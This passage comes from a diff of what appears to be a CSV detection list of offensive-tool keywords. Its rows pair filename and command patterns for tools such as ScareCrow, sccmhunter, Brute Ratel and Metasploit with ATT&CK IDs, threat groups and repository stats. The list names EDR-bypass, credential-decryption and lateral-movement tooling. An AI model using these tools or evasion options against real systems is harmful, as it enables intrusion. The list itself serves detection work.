T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -injection*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -Loader * ","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -noamsi*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -noetw*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -obfu*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow*_darwin_amd64*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow*_windows_amd64.exe*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow*KnownDLL*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow*ProcessInjection*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow*windows_amd64.exe*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","438","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" +"*ScareCrow.go*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow/Cryptor*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow/limelighter*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow/Loader*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow/Utils*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow_*_darwin_amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow_*_linux_amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow_*amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow_checksums.txt*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*SCCM_DLLSiteloading.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*sccmdecryptpoc.*","offensive_tool_keyword","sccmdecryptpoc","SCCM Account Password Decryption POC","T1555.003","TA0006","N/A","N/A","Credential Access","https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sccmhunter.db","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" "*sccmhunter.git*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" "*sccmhunter.py*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" "*sccmwtf.py*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" "*scdivert localhost *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*scheduledtask_utils.py *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*scheduledtask_utils.py *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*ScheduleRunner.csproj*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*ScheduleRunner.exe*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*ScheduleRunner.sln*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" -"*schlamperei.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*schlamperei.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*schshell.cna*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 